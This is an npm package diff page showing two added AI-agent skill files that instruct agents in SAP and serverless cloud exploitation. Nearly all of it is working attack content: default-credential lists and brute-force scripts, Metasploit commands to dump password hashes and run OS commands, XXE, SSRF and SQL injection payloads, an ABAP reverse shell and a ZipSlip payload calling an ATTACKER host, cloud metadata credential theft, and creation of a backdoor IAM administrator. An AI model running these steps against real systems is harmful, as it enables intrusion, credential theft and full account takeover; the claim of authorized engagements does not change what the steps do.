npm - rtexit-method - Versions diffs - 0.1.6 → 0.1.8 - Mend

rtexit-method 0.1.6 → 0.1.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (11) hide show

package/packaged-assets/.agents/skills/rt-sap-exploitation/SKILL.md ADDED Viewed

@@ -0,0 +1,275 @@
+---
+name: rt-sap-exploitation
+description: "SAP system exploitation skill for authorized engagements. SAP service discovery and fingerprinting, default credential testing, SAP RFC enumeration with Metasploit modules, ICM web server exploitation, SAP GUI attacks, ABAP code injection, SAP Message Server vulnerability (CVE-2020-6207), SAP Router bypass, SAP HANA database attacks, and privilege escalation within SAP. Use when engagement scope includes SAP ERP, S/4HANA, or SAP NetWeaver systems."
+---
+# rt-sap-exploitation — SAP System Exploitation
+## Overview
+SAP is the backbone ERP system for many large enterprises — it holds financial data, HR records, supply chain information, and business-critical processes. Compromising SAP is often the most impactful finding in an enterprise engagement. SAP systems are frequently misconfigured, run outdated patches, and use default credentials.
+---
+## Phase 1 — Discovery & Fingerprinting
+```bash
+# SAP port landscape
+# 3200-3299 = SAP GUI (DIAG protocol) — SID 00-99
+# 3300-3399 = RFC
+# 8000-8099 = ICM HTTP
+# 4300-4399 = Message Server
+# 3600 = SAP Router
+# 50000+ = SAP HANA
+nmap -sV -p 3200-3299,3300-3399,8000-8099,4300-4399,3600 TARGET_IP
+# Identify SAP system ID (SID) and instance
+# SID = 3-character identifier (e.g., PRD, DEV, QAS)
+# Instance = 2-digit number (00-99)
+# HTTP-based fingerprinting
+curl http://SAP_IP:8000/
+curl http://SAP_IP:8000/sap/bc/ping  # SAP alive check
+curl http://SAP_IP:8000/sap/bc/gui/sap/its/webgui  # Web GUI
+# ICM server info
+curl http://SAP_IP:8000/sap/bc/soap/wsdl?services=BAPI_ACTIVITYTYPE_GETLIST
+```
+---
+## Phase 2 — Default Credentials
+```bash
+# SAP default accounts (try ALL of these)
+# Format: username / password
+# System accounts (always exist)
+SAP* / 06071992       # Master superuser
+SAP* / PASS           # Alternative default
+DDIC / 19920706       # Data Dictionary user (has all authorizations)
+EARLYWATCH / SUPPORT  # Early Watch service account
+TMSADM / $1Pawd2&    # Transport Management
+# Application-specific
+SOLMAN_ADMIN / SOLMAN
+SAPSYS / MANAGER
+BASIS / BASIS
+# Try via SAP GUI (port 3200)
+# Or via RFC:
+python3 << 'EOF'
+import pyrfc  # pip install pyrfc
+connections_to_try = [
+    {"user": "SAP*",       "passwd": "06071992"},
+    {"user": "SAP*",       "passwd": "PASS"},
+    {"user": "DDIC",       "passwd": "19920706"},
+    {"user": "EARLYWATCH", "passwd": "SUPPORT"},
+]
+for creds in connections_to_try:
+    try:
+        conn = pyrfc.Connection(
+            ashost="SAP_IP", sysnr="00", client="000",
+            **creds
+        )
+        print(f"SUCCESS: {creds['user']}/{creds['passwd']}")
+        conn.close()
+    except pyrfc.LogonError:
+        print(f"FAILED: {creds['user']}")
+EOF
+```
+---
+## Phase 3 — SAP RFC Enumeration & Exploitation
+```bash
+# RFC = Remote Function Call — SAP's RPC mechanism
+# Many RFCs callable without auth or with low-priv auth
+# Metasploit SAP modules
+msfconsole
+# Enumerate RFC services
+use auxiliary/scanner/sap/sap_rfc_dbcon  # Database connections
+use auxiliary/scanner/sap/sap_rfc_eps_get_directory_listing  # Directory listing
+use auxiliary/scanner/sap/sap_rfc_read_table  # Read any DB table!
+# Read SAP database tables (often works with any valid user)
+use auxiliary/admin/sap/sap_rfc_read_table
+set RHOSTS SAP_IP
+set SID PRD
+set CLIENT 000
+set USERNAME ANY_VALID_USER
+set PASSWORD ANY_VALID_PASS
+set TABLE USR02   # User table (contains hashed passwords)
+run
+# Output: all SAP user accounts + password hashes
+# Crack hashes with hashcat -m 7700 (SAP CODVN B)
+# Read sensitive tables
+set TABLE RFCDES   # RFC destinations (contains cleartext passwords!)
+set TABLE ICFSERVL # ICF services
+set TABLE T000     # Clients/mandants
+# ABAP OS command execution (if RFC_OS_COMMAND available)
+use auxiliary/admin/sap/sap_rfc_os_command
+set COMMAND "id"
+run
+# → OS-level command execution on SAP server
+```
+---
+## Phase 4 — CVE-2020-6207 (SAP Message Server — Missing Auth)
+```bash
+# SAP Message Server on port 4300/4301 — no authentication by default
+# Allows registering rogue application servers → intercept connections
+# Check if vulnerable
+curl http://SAP_IP:4300/msgserver/text/logon
+# Exploit: register rogue app server
+# metasploit
+use auxiliary/admin/sap/sap_ms_rogue_dispatcher
+set RHOSTS SAP_IP
+set LHOST YOUR_IP
+run
+# → Can intercept SAP GUI connections → credential theft
+# sapms_exploit.py
+python3 sapms_exploit.py --host SAP_IP --port 4300 --sid PRD
+```
+---
+## Phase 5 — SAP ICM Web Attacks
+```bash
+# ICM = Internet Communication Manager (SAP's web server)
+# Exposed web services are often vulnerable
+# Find exposed ICF services
+curl "http://SAP_IP:8000/sap/bc/" -v
+# Look for: /sap/bc/soap/, /sap/bc/rest/, /sap/bc/gui/
+# XXE via SOAP
+curl -X POST "http://SAP_IP:8000/sap/bc/soap/wsdl" \
+  -H "Content-Type: text/xml" \
+  -d '<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<SOAP-ENV:Envelope>
+  <SOAP-ENV:Body>&xxe;</SOAP-ENV:Body>
+</SOAP-ENV:Envelope>'
+# SSRF via SAP web services
+curl "http://SAP_IP:8000/sap/bc/rest/testservice?url=http://169.254.169.254/"
+# Verb tampering on restricted services
+curl -X HEAD "http://SAP_IP:8000/sap/bc/admin/"
+curl -X OPTIONS "http://SAP_IP:8000/sap/bc/admin/"
+```
+---
+## Phase 6 — ABAP Code Injection
+```bash
+# ABAP = SAP's programming language
+# If you have SE38/SE80 transaction access → execute ABAP code → OS commands
+# Via SAP GUI (port 3200) with dev access:
+# SE38 → Create new program → Run
+# ABAP OS command execution:
+DATA: lv_command TYPE string.
+lv_command = 'id > /tmp/pwned.txt'.
+CALL FUNCTION 'SXPG_COMMAND_EXECUTE'
+  EXPORTING
+    commandname = 'Z_CMD'
+    additional_parameters = lv_command.
+# Read file
+CALL FUNCTION 'GUI_UPLOAD'
+  EXPORTING filename = '/tmp/pwned.txt'
+  TABLES data_tab = lt_data.
+# Reverse shell via ABAP
+CALL FUNCTION 'SXPG_COMMAND_EXECUTE'
+  EXPORTING additional_parameters =
+    'bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'.
+```
+---
+## Phase 7 — SAP HANA Database Attacks
+```bash
+# SAP HANA = in-memory database (port 30013, 39013)
+# Web IDE: port 8090
+# SQL port: 39015
+nmap -sV -p 30013,39013,39015,8090 HANA_IP
+# Default HANA credentials
+# SYSTEM / manager
+# SYSTEM / HanaSystem1
+# HANA web IDE (if exposed)
+curl http://HANA_IP:8090/sap/hana/ide/
+# SQL via Python
+python3 << 'EOF'
+from hdbcli import dbapi  # pip install hdbcli
+conn = dbapi.connect(
+    address="HANA_IP",
+    port=39015,
+    user="SYSTEM",
+    password="manager"
+)
+cursor = conn.cursor()
+# Dump all schemas
+cursor.execute("SELECT SCHEMA_NAME FROM SCHEMAS")
+for row in cursor: print(row)
+# Dump SAP application users
+cursor.execute("SELECT * FROM SAPHANADB.USR02")
+for row in cursor: print(row)
+# OS command via HANA procedure (if priv)
+cursor.execute("CALL SYS.SYSTEM_REPLICATION_STATUS()")
+# Or native stored procedures that allow file I/O
+EOF
+# HANA brute force
+hydra -l SYSTEM -P rockyou.txt HANA_IP -s 39015 -f tcp
+```
+---
+## Skill Levels
+**BEGINNER:** SAP port scan + default credential testing via browser/GUI + read USR02 table
+**INTERMEDIATE:** Metasploit RFC modules + CVE-2020-6207 Message Server + ICM web service attacks
+**ADVANCED:** ABAP code execution + HANA database access + full credential extraction
+**EXPERT:** SAP Router bypass + custom RFC exploitation + ABAP webshell deployment + SAP transport system backdoor
+---
+## References
+- SAP security research: https://www.onapsis.com/research
+- Metasploit SAP modules: https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/scanner/sap
+- CVE-2020-6207: https://www.cvedetails.com/cve/CVE-2020-6207/
+- SAP Hacking Guide: https://conference.hitb.org/hitbsecconf2011ams/materials/D2T2%20-%20Mariano%20Nunez%20-%20SAP%20Hacking.pdf
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/

package/packaged-assets/.agents/skills/rt-serverless/SKILL.md ADDED Viewed

@@ -0,0 +1,274 @@
+---
+name: rt-serverless
+description: "Serverless function exploitation skill for authorized engagements. AWS Lambda privilege escalation and data exfiltration, Azure Functions abuse, GCP Cloud Functions exploitation, environment variable extraction from serverless contexts, event injection attacks (S3 trigger, SQS, SNS), function URL misconfiguration, cold start timing attacks, shared filesystem abuse, and lateral movement from serverless to cloud account. Use when engagement scope includes cloud-native or serverless architectures."
+---
+# rt-serverless — Serverless Function Exploitation
+## Overview
+Serverless functions (Lambda, Azure Functions, Cloud Functions) have a unique attack surface: they run with IAM roles, have environment variables containing secrets, share underlying infrastructure, and are triggered by cloud events that attackers can inject into. A misconfigured Lambda can be the pivot from an external vulnerability to full cloud account takeover.
+---
+## Phase 1 — Discovery & Enumeration
+```bash
+# AWS Lambda enumeration
+aws lambda list-functions --region us-east-1
+aws lambda get-function --function-name target-function
+# Shows: code location (S3 URL), environment variables (if you have IAM rights), role
+# Download function code
+aws lambda get-function --function-name target-function \
+  --query 'Code.Location' --output text | xargs curl -o function.zip
+unzip function.zip -d function_code/
+# Analyze code for: hardcoded creds, SQL queries, internal endpoints
+# Get function policy (who can invoke it)
+aws lambda get-policy --function-name target-function
+# If Resource: "*" → publicly invokable
+# List function URLs (direct HTTPS invocation without IAM)
+aws lambda list-function-url-configs --function-name target-function
+# AuthType: NONE = unauthenticated invoke = high risk
+# Azure Functions enumeration
+az functionapp list --output table
+az functionapp function list --name FUNCTION_APP --resource-group RG
+# GCP Cloud Functions
+gcloud functions list
+gcloud functions describe FUNCTION_NAME --region us-central1
+```
+---
+## Phase 2 — Unauthenticated Function Invocation
+```bash
+# Lambda Function URLs with AuthType: NONE
+curl https://RANDOM_ID.lambda-url.us-east-1.on.aws/
+# Lambda with resource policy allowing public invoke
+aws lambda invoke --function-name target-function \
+  --payload '{"action":"admin","user":"attacker"}' \
+  --cli-binary-format raw-in-base64-out output.json
+cat output.json
+# Azure Function with anonymous auth level
+curl "https://FUNCTIONAPP.azurewebsites.net/api/FUNCTION_NAME"
+# Or with function key:
+curl "https://FUNCTIONAPP.azurewebsites.net/api/FUNCTION_NAME?code=FUNCTION_KEY"
+# Find function keys (often in source code, CI/CD, or Azure Portal)
+az functionapp function keys list --name FUNCTIONAPP --resource-group RG --function-name FUNC
+# GCP unauthenticated function
+curl "https://REGION-PROJECT.cloudfunctions.net/FUNCTION_NAME"
+# allUsers with invoker role = public
+gcloud functions get-iam-policy FUNCTION_NAME
+```
+---
+## Phase 3 — Environment Variable Extraction
+```bash
+# Lambda environment variables often contain:
+# - Database credentials
+# - API keys (Stripe, Twilio, SendGrid)
+# - JWT signing secrets
+# - Internal service URLs
+# - AWS credentials for other services
+# Extract env vars if you have lambda:GetFunction
+aws lambda get-function-configuration --function-name target-function \
+  | jq '.Environment.Variables'
+# Output:
+# {
+#   "DB_PASSWORD": "secretpassword",
+#   "STRIPE_API_KEY": "sk_live_...",
+#   "INTERNAL_API_KEY": "abc123"
+# }
+# From inside function execution (SSRF → Lambda metadata)
+# If the function is vulnerable to SSRF:
+curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+# Or Lambda-specific endpoint:
+curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+# Returns temporary credentials for the function's IAM role
+# If you have code execution inside function:
+# Process environment dump
+import os
+print(dict(os.environ))
+# All env vars including AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN
+```
+---
+## Phase 4 — Event Injection Attacks
+```bash
+# Functions triggered by cloud events — inject malicious events
+# S3 trigger: function processes files uploaded to S3 bucket
+# If you have S3 write access → upload malicious file → trigger function
+# Upload file that causes path traversal in function
+aws s3 cp malicious.csv s3://trigger-bucket/uploads/../../etc/passwd
+# Upload ZIP that causes ZipSlip in function
+python3 << 'EOF'
+import zipfile
+with zipfile.ZipFile("zipslip.zip", "w") as z:
+    z.writestr("../../tmp/pwned.sh", "#!/bin/bash\ncurl http://ATTACKER/shell.sh | bash")
+EOF
+aws s3 cp zipslip.zip s3://trigger-bucket/uploads/
+# SQS injection: function processes SQS messages
+aws sqs send-message \
+  --queue-url https://sqs.us-east-1.amazonaws.com/ACCOUNT/queue-name \
+  --message-body '{"action":"admin_override","user_id":"1","admin":true}'
+# SNS injection
+aws sns publish \
+  --topic-arn arn:aws:sns:us-east-1:ACCOUNT:topic-name \
+  --message '{"type":"webhook","url":"http://169.254.169.254/latest/meta-data/"}'
+# API Gateway → Lambda injection
+# Standard web attacks (SQLi, XSS, SSRF) via HTTP
+curl "https://API_ID.execute-api.us-east-1.amazonaws.com/prod/user?id=1' OR '1'='1"
+```
+---
+## Phase 5 — IAM Role Abuse from Lambda
+```bash
+# Lambda functions have an IAM execution role
+# Over-privileged roles → lateral movement to other AWS services
+# From inside function (or via SSRF):
+# Get temporary credentials
+curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+# Response:
+# {
+#   "AccessKeyId": "ASIA...",
+#   "SecretAccessKey": "...",
+#   "Token": "...",
+#   "Expiration": "2024-..."
+# }
+# Use credentials to escalate
+export AWS_ACCESS_KEY_ID="ASIA..."
+export AWS_SECRET_ACCESS_KEY="..."
+export AWS_SESSION_TOKEN="..."
+# Check what the role can do
+aws sts get-caller-identity
+aws iam list-attached-role-policies --role-name lambda-execution-role
+aws iam get-role-policy --role-name lambda-execution-role --policy-name inline-policy
+# Common over-privilege patterns:
+aws s3 ls --recursive  # s3:* = read all buckets
+aws secretsmanager list-secrets  # All secrets
+aws ssm describe-parameters  # All SSM parameters (contain creds)
+aws ec2 describe-instances  # Internal infrastructure map
+# Best case: iam:* → full account takeover
+aws iam create-user --user-name backdoor
+aws iam attach-user-policy --user-name backdoor \
+  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
+aws iam create-access-key --user-name backdoor
+```
+---
+## Phase 6 — Shared Filesystem & Cold Start Attacks
+```bash
+# /tmp in Lambda is shared across warm instances (same account, same function)
+# Write to /tmp → next warm invocation reads it
+# Test for shared /tmp abuse
+# Invoke 1: write marker
+curl -X POST FUNCTION_URL -d '{"action":"write","path":"/tmp/marker","content":"pwned"}'
+# Invoke 2: read marker
+curl -X POST FUNCTION_URL -d '{"action":"read","path":"/tmp/marker"}'
+# If response = "pwned" → /tmp shared across invocations
+# Lambda Layer abuse
+# Layers are shared code across functions
+# If you can modify a layer: aws lambda publish-layer-version
+# All functions using that layer execute your code
+# Cold start timing attack
+# Functions have initialization code that runs once
+# If init code is slow → cold start takes longer → timing reveals code paths
+# Measure cold start time
+python3 << 'EOF'
+import requests, time
+# Force cold start by changing something
+for _ in range(5):
+    start = time.time()
+    r = requests.post(FUNCTION_URL, json={"probe": True})
+    elapsed = time.time() - start
+    print(f"Response time: {elapsed:.3f}s | Status: {r.status_code}")
+    time.sleep(0.1)
+# Long first response = cold start = leaked initialization info
+EOF
+```
+---
+## Phase 7 — Azure Functions & GCP Specific
+```bash
+# Azure Functions — Managed Identity abuse
+# Functions with Managed Identity can access Azure resources
+# From inside Azure function (SSRF to IMDS):
+curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2019-08-01&resource=https://management.azure.com/" \
+  -H "Metadata: true"
+# Returns access token for the function's managed identity
+# Use token to access Azure resources
+TOKEN=$(curl -s "http://..." -H "Metadata: true" | jq -r '.access_token')
+curl -H "Authorization: Bearer $TOKEN" \
+  "https://management.azure.com/subscriptions?api-version=2020-01-01"
+# GCP Cloud Functions — Service Account abuse
+curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
+  -H "Metadata-Flavor: Google"
+# Returns access token for the function's service account
+TOKEN=$(curl -s "http://..." -H "Metadata-Flavor: Google" | python3 -c "import json,sys; print(json.load(sys.stdin)['access_token'])")
+curl -H "Authorization: Bearer $TOKEN" \
+  "https://cloudresourcemanager.googleapis.com/v1/projects"
+```
+---
+## Skill Levels
+**BEGINNER:** Lambda function enumeration + download code + check env vars + unauthenticated invoke
+**INTERMEDIATE:** Event injection via S3/SQS + IAM role credential extraction via IMDS SSRF + Secrets Manager dump
+**ADVANCED:** Lambda layer modification for persistence + shared /tmp abuse + managed identity chaining
+**EXPERT:** Custom event injection chains + cross-function lateral movement + serverless-to-EC2 pivot via over-privileged role
+---
+## References
+- Pacu (AWS exploitation): https://github.com/RhinoSecurityLabs/pacu
+- Lambda security research: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
+- Serverless Goat (lab): https://github.com/OWASP/Serverless-Goat
+- MITRE T1648: https://attack.mitre.org/techniques/T1648/